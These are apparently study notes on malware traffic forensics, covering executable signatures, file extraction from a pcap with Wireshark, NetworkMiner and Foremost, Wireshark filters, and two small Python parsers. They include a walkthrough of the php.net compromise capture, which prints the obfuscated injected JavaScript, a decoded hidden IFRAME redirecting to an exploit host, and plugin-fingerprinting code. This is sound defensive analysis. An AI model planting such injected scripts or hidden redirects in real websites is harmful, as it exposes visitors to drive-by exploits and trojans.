Note: Executables on Microsoft systems usually start with the bytes 4D 5A in hex, i.e. the ASCII string "MZ".
The MS-DOS MZ executable format is the executable file format used for .EXE files in MS-DOS.
The file can be identified by the ASCII string "MZ" (hexadecimal: 4D 5A) at the
beginning of the file (the "magic number").
Filename extension : .exe
Magic number / file_signatures : MZ or ZM
Type of format : Binary, executable
This is a list of file signatures, data used to identify or verify the content of a file. Such signatures are also known as magic numbers.
List_of_file_signatures: https://en.wikipedia.org/wiki/List_of_file_signatures
Malware Analysis Using WireShark 1:
When we are involved in incident handling and are in charge of analyzing a traffic capture in pcap format related to an attack, one of the things we usually need to do is recover the files that were downloaded. The reason is that we need a copy of the malware or the exploit in order to analyze it by reverse engineering or similar means.
We usually identify the original sources these files were downloaded from just by analyzing the pcap file, but they disappear in a short period of time from where they were originally hosted. Because of that, we need to extract them directly from the pcap file.
This post shows three different ways to achieve this goal using the pcap hosted by Barracuda related to the www.php.net compromise, which can be downloaded here:
1. Wireshark is the most popular network protocol analyzer. It is capable of extracting all the files which were downloaded and captured.
If you load the pcap file in Wireshark and use the display filter below...
---> http contains "in DOS mode" [the search appears to be case sensitive]
you can check that some executables were downloaded. If you see text in the pcap like "This program cannot be run in DOS mode", it means some executables were downloaded to the machine.
2. We are able to save all the files which were downloaded (executables, pictures, JavaScript, etc.) by clicking
File --> Export Objects --> HTTP and then clicking on "Save all".
3. After saving them in a folder (make sure you are not on your official/critical network, as these files contain malware), list it in a command prompt to see the files that were recovered.
# ls
Use the command below to filter only the executables.
# file * | grep PE32
00000238.exe: PE32 executable (GUI) Intel 80386, for MS Windows
00000426.exe: PE32 executable (GUI) Intel 80386, for MS Windows
00000698.exe: PE32 executable (GUI) Intel 80386, for MS Windows
00000979.exe: PE32 executable (GUI) Intel 80386, for MS Windows
00001561.exe: PE32 executable (console) Intel 80386, for MS Windows
If we upload these files to VirusTotal, we see that all of them have been categorized as malicious.
4. Alternatively, run sha256sum or md5sum against the files and look up the hash in VT for more details.
Investigative Process md5sum Lab: http://www.etree.org/md5com.html
# md5sum filename
MD5 is computed only over the data of the file, nothing else.
An online hash value calculator will give the values of all hashes for the file.
If we change/modify the file content, the MD5 value also changes. If we reverse the change, the MD5 value reverts as well.
This is with respect to file integrity: whether the file has been modified or not.
Confidentiality: here you do want to change the content, from plain text to cipher text.
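The following is an added example (not code from the original post) that does in Python what the notes above do by hand: it checks the "MZ" magic, follows the e_lfanew pointer at offset 0x3C to the "PE\0\0" signature the way `file` does before printing "PE32 executable", computes MD5/SHA-256 like md5sum/sha256sum, and shows that flipping one byte changes the digest and reverting it restores the digest. The sample buffer is constructed here so the script runs offline; it only imitates the headers of a PE file and is not a real or runnable binary.

```python
import hashlib
import struct
from pathlib import Path

# Machine values from the PE COFF header (IMAGE_FILE_MACHINE_*), as `file` reports them.
MACHINES = {0x014C: "Intel 80386", 0x8664: "x86-64", 0x01C0: "ARM", 0xAA64: "ARM64"}


def identify(data: bytes) -> str:
    """Classify a buffer the way `file` does for MZ/PE: check the 'MZ' magic,
    follow e_lfanew (uint32 at 0x3C) and look for the 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] not in (b"MZ", b"ZM"):
        return "not an MZ executable"
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return "MZ executable (DOS or non-PE)"
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    # Optional header starts 24 bytes after the signature; its magic tells PE32 from PE32+.
    kind = "PE32"
    if e_lfanew + 26 <= len(data) and struct.unpack_from("<H", data, e_lfanew + 24)[0] == 0x20B:
        kind = "PE32+"
    name = MACHINES.get(machine, "machine 0x%04X" % machine)
    return "%s executable, %s" % (kind, name)


def make_sample_pe(machine: int = 0x014C) -> bytes:
    """Constructed sample, not a real binary: DOS header, DOS stub text and a bare
    PE signature plus COFF header so that identify() has something to walk."""
    hdr = bytearray(0x40)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)           # e_lfanew -> 0x80
    stub = b"This program cannot be run in DOS mode.\r\n$"
    body = bytes(hdr) + stub
    body += b"\x00" * (0x80 - len(body))
    body += b"PE\0\0" + struct.pack("<H", machine)   # COFF header begins with Machine
    body += b"\x00" * 18                               # remaining 18 bytes of the COFF header
    body += struct.pack("<H", 0x10B)                   # optional header magic: PE32
    return body


def file_hashes(data: bytes) -> dict:
    """Same digests md5sum and sha256sum print: computed over the bytes only."""
    return {"md5": hashlib.md5(data).hexdigest(),
            "sha256": hashlib.sha256(data).hexdigest()}


def integrity_roundtrip(data: bytes, offset: int = 0x10) -> bool:
    """Flip one byte: the MD5 changes. Flip it back: the original MD5 returns."""
    before = file_hashes(data)["md5"]
    buf = bytearray(data)
    buf[offset] ^= 0xFF
    during = file_hashes(bytes(buf))["md5"]
    buf[offset] ^= 0xFF
    after = file_hashes(bytes(buf))["md5"]
    return before != during and before == after


def scan_directory(directory: str) -> list:
    """Equivalent of `file * | grep PE32` followed by sha256sum over a folder of exported objects."""
    rows = []
    for path in sorted(Path(directory).iterdir()):
        if path.is_file():
            data = path.read_bytes()
            kind = identify(data)
            if kind.startswith("PE32"):
                rows.append((path.name, kind, file_hashes(data)["sha256"]))
    return rows


if __name__ == "__main__":
    sample = make_sample_pe()
    print(identify(sample), file_hashes(sample)["sha256"])
    print("integrity round-trip:", integrity_roundtrip(sample))
```

Point `scan_directory()` at the folder produced by "Export Objects --> HTTP --> Save all" to get the same (name, type, SHA-256) triples you would otherwise assemble from `file` and `sha256sum`, ready to look up in VirusTotal.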
NetworkMiner
----------------------
NetworkMiner is another Network Forensic Analysis Tool (NFAT) for Windows. Also, it can be installed on Linux using Mono. This tool is a great alternative to Wireshark if you just want to extract the files which were downloaded, look at the sessions, discover the DNS queries or get details about the mails detected from a pcap file.
Foremost
-------------
Foremost is a well known file carving tool.
Foremost is a forensic program to recover lost files based on their headers, footers, and internal data structures. Foremost can work on image files, such as those generated by dd, Safeback, Encase, etc, or directly on a drive. The headers and footers can be specified by a configuration file or you can use command line switches to specify built-in file types. These built-in types look at the data structures of a given file format allowing for a more reliable and faster recovery.
Use Foremost to extract files from a pcap file.
Once the pcap is downloaded, we execute the command below to extract all the files from it.
# foremost -v -i 5f810408ddbbd6d349b4be4766f41a37.pcap
Output directory: /root/Desktop/pcap/output
Configuration file: /etc/foremost.conf
Processing: 5f810408ddbbd6d349b4be4766f41a37.pcap
|------------------------------------------------------------------
File: 5f810408ddbbd6d349b4be4766f41a37.pcap
Start: Sat Feb 18 18:23:14 2017
Length: 1 MB (1256656 bytes)
Num Name (bs=512) Size File Offset Comment
0: 00000093.gif 2 KB 47775 (120 x 67)
1: 00000104.gif 61 B 53438 (11 x 11)
2: 00000201.htm 1 KB 103400
3: 00000209.htm 209 B 107474
4: 00000211.htm 11 KB 108304
5: 00000238.exe 87 KB 122358 10/21/2013 23:12:21
6: 00000426.exe 126 KB 218488 10/21/2013 23:20:44
7: 00000698.exe 132 KB 357688 11/06/2012 19:06:55
8: 00000979.exe 233 KB 501404 10/22/2013 19:15:03
9: 00001561.exe 236 KB 799271 10/21/2013 22:15:46
10: 00000103.png 178 B 52913 (197 x 20)
11: 00000103_1.png 207 B 53161 (197 x 20)
*|
Finish: Sat Feb 18 18:23:14 2017
12 FILES EXTRACTED
gif:= 2
htm:= 3
exe:= 5
png:= 2
------------------------------------------------------------------
Foremost finished at Sat Feb 18 18:23:14 2017
# ls
5f810408ddbbd6d349b4be4766f41a37.pcap output
root@kali:~/Desktop/pcap# cd output/
root@kali:~/Desktop/pcap/output# ls
audit.txt exe gif htm png
root@kali:~/Desktop/pcap/output# cd exe/
root@kali:~/Desktop/pcap/output/exe# ls
00000238.exe 00000426.exe 00000698.exe 00000979.exe 00001561.exe
root@kali:~/Desktop/pcap/output/exe# sha256sum 0*
2bcc5f03e1d63c5fab4aa362f6aecd43def44cc3c246effc13accb7b27b1bd45 00000238.exe
647e4bbed78346eccc7c2d12826da5f17414110e52fb200ee55f2b8c5df533f1 00000426.exe
38bc430e9d8656ee227e48236157e716b1d5038e83e53937cb534a5920d28c28 00000698.exe
15964d7dd9644c8ce29fbcc4585b85394af10545ac2a2ba2315befe8e93b2a4d 00000979.exe
32159b706d1addf63cdb1978291fc7222558d8fb7a3044775e242fba9661838d 00001561.exe
root@kali:~/Desktop/pcap/output/exe# md5sum 0*
45321f9c1e2ac0a99c0724dde764ba17 00000238.exe
03305ab862fc83383f8f9482210682cd 00000426.exe
528294f14b868b8e13cc6fd08fa3598a 00000698.exe
f701064c0e436dd2408a580e1711f7fd 00000979.exe
a77f03860762b1bbbdf533a529e98daf 00001561.exe
Note:
[ But the checksums are different from the ones we got with Wireshark or NetworkMiner.
It seems like Foremost hasn't worked well with the pcap file... For this reason I don't usually use it with a pcap file.]
Search for a selection of file types (-t doc,jpg,pdf,xls) in the given image file (-i image.dd):
root@kali:~# foremost -t doc,jpg,pdf,xls -i image.dd
Processing: image.dd
|*|
Xplico
*********
Malware Analysis Using WireShark 2: PHP.net Compromise
http.request.method == "GET" and http.response.code == 200
If we upload the PCAP file to VirusTotal we can see the URLs which were visited by the infected computer in the "File details" section. Alternatively, filter the traffic in Wireshark: GET requests with a 200 success code, or the website name itself.
http.request.method == "GET" and http.host contains "php.net"
http.host=="exact.DomainName.here"
http.host contains "partial.DomainName.here"
We can see that the www.php.net website was visited. If we open the PCAP file with Wireshark and look at the "Follow TCP Stream" of the request for www.php.net/userprefs.js, we can see the script with the obfuscated code in the picture below. (This malicious code has since been removed from the website.)
+Sf\x7f5cSe{TdM\x08(tpIf~rId^ xg?L~rhj*\x09_\x08g{\\lO\x00\" ~rHb^xa8VZo<ETXc\x16VXi\x1d*\ x01]\x0a#\x00iYVFO\"\x00Vri=| zC>|rM>f\\ZhN\\zc2*#
\x7f#W2j\x09YvNg\"\x0aTPa\ x1aVRd3\\zn2nVri?|zCicVPk\x10\ \Z8\x1a\\z87,(\x0bW\"mGA+\ x1boLyM(L[tNm(\x20\\zjo~rn; TXg\x11W|rIk\x0a)\x7f\"OOc[ TLM\
x0a(Vpi\x16^Xn\x14VPnKL~rHb^ xg8^~rolTX2\x15(\x09W\ x013UdGfOtg\x20QbH\x19nodmTg\ x00\\dM\x13lMlG~O\x20Wd9u#\ x0a}cflOu\x091",b2=["\x73\x70\ x6c\
x69\x74",Ud=(0x84^0xc3)*(0xf9- 0xf3)/2,"\x6c\x65\x6e\x67\x74\ x68","\x68\x61\x73\x4f\x77\ x6e\x50\x72\x6f\x70\x65\x72\ x74\x79"],VV="\xc3\x9f\xae
\x15\xf9\x928\xb4{\xcbV\x00D? GD|\x9f{:[\xa8\xd0\x9a",NQ= LUI["\x73\x75\x62\x73\x74\x72\ x69\x6e\x67"](0,VV[b2[2]]); VDG=function(Av){var sCV,j9,
nB=j9="",GC=0;Av=Av[b2[0]](nB) ;for(sCV in Av){if(Av[b2[3]](sCV)){j9+= SjB(Av[sCV],NQ[b2[0]](nB)[GC%= NQ[b2[2]]]);GC++;}}return(j9); };NQ=VDG(VV);
Anv[VDG("oVkD")](VDG(LUI[VDG(" yUh[|ZiLm")](VV[VDG("fEdO|@")] )))})(window,SjB=function(uC, lp,XN,OA){uC=uC[XN="\x63"+(OA= "\x68\x61\x72\x43\x6f\
x64\x65")+"\x41\x74"](0); return(String["\x66\x72\x6f\ x6d\x43"+OA](uC&Ud|((uC&(~Ud& 0xff))^(lp[XN](0)&(~Ud&0xff))) ))});GET /www.php.net/images
The guys from AlienVault have decoded the script. They published the picture below with the de-obfuscated code. We can see an IFRAME of 10x10px, placed on the php.net site, which redirects the connection to another website.
<DIV style="height: 10px; width: 10px; overflow: hidden; position: absolute; left:
<IFRAME src=http://url.whichusb.co.uk/stat.htm></IFRAME></DIV>
If we follow in Wireshark the link contained in the IFRAME in the picture above, we can see how the code tries to gather information about the computer. It wants to know whether the browser has the Java or Adobe Reader plugins installed and enabled.
The next URL the computer is redirected to is /PluginDetect_All.js. In the payload of this connection we can see that the attackers are using PluginDetect in order to detect the browser plugins.
http.request.method == "GET"
Check the Follow ----> TCP Stream option against the file
PluginDetect_All.js in Wireshark. You can see the scripts below in the file:
<script type="text/javascript" src="PluginDetect_All.js"></
var os=PluginDetect.OS
var javaversion=PluginDetect.getVersion('Java','./getjavainfo.jar');
var adobe=PluginDetect.getVersion("AdobeReader");
</html>
GET /PluginDetect_All.js HTTP/1.1
Accept: */*
Referer: http://url.whichusb.co.uk/stat.htm
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: url.whichusb.co.uk
/* PluginDetect v0.7.5 by Eric Gerds www.pinlady.net/PluginDetect [ onWindowLoaded isMinVersion getVersion onDetectionDone getInfo Java(OTF & NOTF)
QT DevalVR Shockwave Flash WMP Silverlight VLC AdobeReader PDFreader(OTF & NOTF) RealPlayer ] *
{b=d.formatNum(d.getNum(t. enabledPlugin.description))} if(d.OS==1&&b){var f=b.split(d.splitNumRegx);s= true;if(j.compare(f,[6,0,12, 200])<0)
{s=false}else{if(j.compare(f,[ 6,0,12,1739])<=0&&j.compare(f, [6,0,12,857])>=0){s=false}}} if(s===false){q=0}if(d.OS<=2)
{if(d.isGecko&&d.compareNums( d.verGecko,d.formatNum("1,8")) <0){q=0}if(d.isChrome){q=0}if( d.isOpera&&d.verOpera<10){q=0} }else{q=0}if(q)
{t=d.insertHTML("object",[" type",j.mimeType[0]],["src","" ,"autostart","false"," imagestatus","false"," controls","stopbutton"],"",j);
t=d.getDOMobj(t);try{k=d. getNum(t.GetVersionInfo())} catch(r){}d.setStyle(t,[" display","none"])}if(!k&&b&&s= ==false){t=j.convertNum(b,j. q3,j.q1);
k=t?t:b}}}else{k=j.version}j. installed=c&&g&&k?1:(c&&g?0:( c?-0.2:-1))}else{t=null;for(i= 0;i<j.progID.length;i++){t=d. getAXO(j.progID[i]);if(t)
{try{k=d.getNum(t. GetVersionInfo());break}catch( r){}}}j.installed=k?1:-1}if(! j.version){j.version=d. formatNum(k)}j.INSTALLED[a]=j. installed}},zz:0};
PluginDetect.initScript();
In the PCAP file we can see how the computer sends a POST request telling the website whether it has the Java or AdobeReader plugin enabled. Then, the web browser is redirected again.
POST /stat.htm HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://url.whichusb.co.uk/stat.htm
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: url.whichusb.co.uk
Content-Length: 14
Connection: Keep-Alive
Cache-Control: no-cache
id=800%7C1%7C1
HTTP/1.1 302 Found
Server: nginx/1.0.15
Date: Tue, 22 Oct 2013 21:23:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Expires: Tue, 22 Oct 2013 21:23:14 GMT
Last-Modified: Tue, 22 Oct 2013 21:23:14 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Location: http://aes.whichdigitalphoto.co.uk/nid?1 --- redirecting
Content-Length: 0
The next URL which was visited is marked in bold in VirusTotal. This means that the files that were downloaded are categorized as malware by some antivirus engines. Now the computer is infected. The first network connection that the malware makes is to a website hosting a JavaScript that detects the computer's location.
GET /app/geoip.js HTTP/1.0
Host: j.maxmind.com
Connection: close
HTTP/1.0 200 OK
Expires: Tue, 22 Oct 2013 19:58:38 GMT
Cache-Control: private, max-age=0
Content-Type: text/javascript; charset=ISO-8859-1
Access-Control-Allow-Origin: *
Content-Length: 512
function geoip_country_code() { return 'US'; }
function geoip_country_name() { return 'United States'; }
function geoip_city() { return 'Campbell'; }
function geoip_region() { return 'CA'; }
function geoip_region_name() { return 'California'; }
function geoip_latitude() { return '37.2803'; }
function geoip_longitude() { return '-121.9567'; }
function geoip_postal_code() { return '95008'; }
function geoip_area_code() { return '408'; }
function geoip_metro_code() { return '807'; }
Conclusion:
If we trust the PCAP file that Barracuda offers us, we can tell that www.php.net was compromised. The hackers uploaded a JavaScript to this site which redirects to another one where there was a web plugin detector. Depending on which browser plugins are enabled in the computer, the website could redirect you to a Java or AdobeReader exploit. Then, after exploiting the vulnerability, a trojan that seems to be the ZeroAccess trojan is downloaded and installed. It seems that this trojan is focused on click fraud.
[
Packet Viewing :
Packet List Column header ( Packet heading)
Packet List Pane : All packet details
Packet Details pane : Frame / Ethernet / Internet Protocol / Transmission control protocol
Packet Bytes pane : ASCII / HEX
]
Some wireshark filters
1. ip.addr == 10.0.0.1 [Sets a filter for any packet with 10.0.0.1, as either the source or dest]
2. ip.addr == 10.0.0.1 && ip.addr==10.0.0.2 [sets a conversation filter between the two defined IP addresses]
ip.src
ip.dst
3. http or dns [sets a filter to display all http and dns]
To view only DNS traffic, type udp.port == 53 (lower case) in the Filter box and press Enter.
Select the DNS packet labeled Standard query A
dns and ip.addr==159.25.78.7
dns and ip.dst==159.25.78.7 or dns and ip.src==159.57.78.7
4. tcp.port == 4000 [sets a filter for any TCP packet with 4000 as a source or dest port]
[Filter for specific port]
udp.port
5. tcp.flags.reset==1 [displays all TCP resets]
6. http.request [displays all HTTP GET requests] : check for the request and response
http.response.code == 200/500/404
7. tcp contains traffic [displays all TCP packets that contain the word 'traffic'. Excellent when searching on a specific string or user ID]
8. !(arp or icmp or dns) [masks out arp, icmp, dns, or whatever other protocols may be background noise, allowing you to focus on the traffic of interest]
How we can exclude some of the noise in the trace file
# !(arp or dns or icmp) : This removes arp, dns and icmp from the trace file and leaves the rest. This is called pruning the trace file.
9. udp contains 33:27:58 [sets a filter for the HEX values of 0x33 0x27 0x58 at any offset]
10. tcp.analysis.retransmission [displays all retransmissions in the trace. Helps when tracking down slow application performance and packet loss]
11. I would first filter on the conversation with the nmap target using the
"ip.addr == 10.0.0.1" filter.
Then you could use the SYN/ACK filter to see the connections that are accepted by the target. Try this - tcp.flags.syn == 1 && tcp.flags.ack == 1
Any packet with these two bits set in the TCP header will be displayed. This gives a list of the open ports.
12. Extract files from pcaps:
HTTP export : You can find this at File > Export > Objects > HTTP; you will be presented with a list of files found in all the HTTP requests.
The bad thing about this feature is that even with the latest version (1.6.5 at the time of this writing) you still can't sort by column or apply any filters, which makes finding something specific hard.
Export bytes : To find this you will have to drill down in the packet you want, depending on the protocol.
Right click > Export selected bytes
The advantage of doing it this way is that you can extract files from protocols other than HTTP (like FTP or SMB) and you can use display filters.
NetworkMiner : NetworkMiner is a tool for network analysis but with a focus on forensic analysis.
It can load a pcap and extract files and other data.
Chaosreader : This tool will analyze and extract session information and files and create
an HTML report you can open in any browser.
chaosreader http-data.pcap
It will create a lot of files, so you may want to launch it inside an empty dir or make a new
one and use the -D option; then you can open index.html.
Refer: https://www.sans.org/reading-room/whitepapers/tools/extracting-files-network-packet-captures-36562
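An added example, not code from the original post or from any of the tools named above, of the two things this section and item 11 describe: pulling downloaded objects out of HTTP responses in a pcap, and listing the ports a scanned host answered with SYN/ACK. It is a minimal pcap/Ethernet/IPv4/TCP walker in the Python standard library; the capture it reads is constructed in the script (a SYN scan of two ports followed by a response carrying an MZ-headed body), and it handles only responses that fit in a single TCP segment. Real captures need TCP reassembly, which is the work Wireshark's Export Objects does for you.

```python
import struct

SYN, RST, PSH, ACK = 0x02, 0x04, 0x08, 0x10


def _ipv4(addr: str) -> bytes:
    return bytes(int(x) for x in addr.split("."))


def build_packet(src, dst, sport, dport, flags, payload=b"") -> bytes:
    """One pcap record: Ethernet + IPv4 + TCP (+ payload). Checksums are left zero."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, flags, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     _ipv4(src), _ipv4(dst)) + tcp
    eth = b"\x00" * 12 + b"\x08\x00" + ip                 # zero MACs, EtherType IPv4
    return struct.pack("<IIII", 0, 0, len(eth), len(eth)) + eth


def build_pcap(packets) -> bytes:
    """Little-endian pcap global header (magic, v2.4, linktype 1 = Ethernet)."""
    return struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1) + b"".join(packets)


def tcp_packets(pcap: bytes):
    """Yield (src, dst, sport, dport, flags, payload) for every TCP/IPv4 frame in a pcap."""
    magic = struct.unpack_from("<I", pcap, 0)[0]
    endian = "<" if magic == 0xA1B2C3D4 else ">"          # nanosecond-pcap magics not handled
    linktype = struct.unpack_from(endian + "I", pcap, 20)[0]
    offset = 24
    while offset + 16 <= len(pcap):
        incl_len = struct.unpack_from(endian + "IIII", pcap, offset)[2]
        frame = pcap[offset + 16: offset + 16 + incl_len]
        offset += 16 + incl_len
        if linktype != 1 or len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue
        ip = frame[14:]
        if ip[9] != 6:                                     # protocol 6 = TCP
            continue
        ihl = (ip[0] & 0x0F) * 4
        total_len = struct.unpack_from("!H", ip, 2)[0]
        tcp = ip[ihl:total_len]
        sport, dport = struct.unpack_from("!HH", tcp, 0)
        data_off = (tcp[12] >> 4) * 4
        src = ".".join(map(str, ip[12:16]))
        dst = ".".join(map(str, ip[16:20]))
        yield src, dst, sport, dport, tcp[13], tcp[data_off:]


def open_ports(pcap: bytes, target: str) -> list:
    """Ports the target answered with SYN+ACK: the tcp.flags.syn == 1 && tcp.flags.ack == 1 filter."""
    return sorted({sport for src, _, sport, _, flags, _ in tcp_packets(pcap)
                   if src == target and flags & (SYN | ACK) == (SYN | ACK)})


def http_objects(pcap: bytes) -> list:
    """Bodies of single-segment HTTP responses, with the 'in DOS mode' check of the http contains filter."""
    objs = []
    for src, _, sport, _, _, payload in tcp_packets(pcap):
        if not payload.startswith(b"HTTP/1."):
            continue
        head, sep, body = payload.partition(b"\r\n\r\n")
        if not sep:
            continue
        headers = {}
        for line in head.split(b"\r\n")[1:]:
            key, _, value = line.partition(b":")
            headers[key.strip().lower().decode()] = value.strip().decode()
        length = int(headers.get("content-length", len(body)))
        objs.append({"server": "%s:%d" % (src, sport),
                     "content_type": headers.get("content-type", ""),
                     "body": body[:length],
                     "dos_stub": b"in DOS mode" in body})
    return objs


# Constructed sample capture: SYN scan of ports 80 (open) and 23 (closed), then a
# response on port 80 whose body starts with the MZ magic and the DOS stub text.
PE_BODY = b"MZ" + b"\x90" * 0x3A + b"This program cannot be run in DOS mode.\r\n$" + b"\x00" * 8
RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n"
            + b"Content-Length: %d\r\n\r\n" % len(PE_BODY) + PE_BODY)
SAMPLE_PCAP = build_pcap([
    build_packet("10.0.0.5", "10.0.0.1", 40001, 80, SYN),
    build_packet("10.0.0.1", "10.0.0.5", 80, 40001, SYN | ACK),
    build_packet("10.0.0.5", "10.0.0.1", 40002, 23, SYN),
    build_packet("10.0.0.1", "10.0.0.5", 23, 40002, RST | ACK),
    build_packet("10.0.0.1", "10.0.0.5", 80, 40001, PSH | ACK, RESPONSE),
])

if __name__ == "__main__":
    print("open ports on 10.0.0.1:", open_ports(SAMPLE_PCAP, "10.0.0.1"))
    for obj in http_objects(SAMPLE_PCAP):
        print(obj["server"], obj["content_type"], len(obj["body"]), "bytes, DOS stub:", obj["dos_stub"])
```

To run it against a real file, replace `SAMPLE_PCAP` with `open("capture.pcap", "rb").read()`; the returned bodies can then be written to disk and classified and hashed exactly as the exported objects were earlier in these notes.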
12. Filter for protocol
dns or http -----> Displays only the dns traffic and http traffic that we have in the trace file
13. Filter which shows any TCP problems in the trace file : packet loss, window problems etc.
# tcp.analysis.flags
14. Select any packet in the TCP conversation that we are interested in looking at and
Right Click----> Follow---->TCP Stream
It will bring up the Follow TCP Stream content if there is any content in the TCP packets of that stream.
15. Filter for some text / tab name / executable etc.
# tcp contains facebook
# udp contains facebook : Which shows all my DNS queries for facebook
16. Check for SYN attack
# tcp.flags.syn == 1
# tcp.flags.reset ==1
17. VOIP
# sip && rtp
Add and Customize Columns in WireShark
1. Check in the Packet Details pane. Select the field (for example the host) you want a column for.
Right click on it ---> Apply as Column
You can see that host/name as a column in the Packet List pane.
2. Customize Columns :
In the following example I will add another column to the Packet List and will customize this column.
Select a packet in the Packet List pane, that contains the TCP protocol.
Expand Transmission Control Protocol in the Packet Details pane.
Select "Source port: ....".
Right-click and select "Apply as Column" to add the column "Source Port" to the Packet List.
Next right-click the column "Source Port" in the Packet List column header.
Select "Edit Column Details…".
Change the Title "Source Port" to "TCP Port".
Change the Field name "tcp.srcport" to "tcp.port".
As you can see in the following screenshot the TCP source and TCP destination port show up in the same column.
3. Display or Hide Columns :